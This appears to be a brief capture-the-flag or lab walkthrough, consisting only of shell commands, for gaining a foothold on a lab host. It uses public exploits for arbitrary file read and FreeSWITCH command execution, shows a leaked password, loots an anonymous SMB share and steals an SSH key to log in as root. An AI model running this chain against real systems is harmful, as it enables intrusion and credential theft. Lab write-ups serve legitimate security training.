Foothold

$ searchsploit -m 49362

$ python 49362.py 192.168.184.240 -p 3000 /etc/passwd

anthony
cassie

$ python 49362.py 192.168.184.240 -p 3000 '/proc/self/cmdline'

cassie:SecondBiteTheApple330

$ smbclient '\\192.168.184.240\backup' -U '' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

$ grep -rwi password

$ python 49362.py 192.168.184.240 -p 3000 '/etc/freeswitch/autoload_configs/event_socket.conf.xml' | grep -i passw

$ telnet 192.168.184.240 8021

$ python 47799.py 192.168.184.240 whoami

$ python 47799.py 192.168.184.240 "ls /home/cassie/"

$ python 49362.py 192.168.184.240 -p 3000 '/home/cassie/id_rsa'

$ chmod 600 id_cassie

$ ssh -F /dev/null -o "IdentitiesOnly=yes" root@192.168.184.240 -i id_cassie